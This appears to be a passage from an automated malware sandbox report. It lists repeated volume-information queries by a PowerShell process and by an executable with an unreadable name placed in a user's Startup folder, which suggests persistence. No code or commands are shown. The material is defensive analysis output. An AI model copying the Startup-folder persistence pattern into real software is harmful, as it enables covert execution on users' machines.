              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
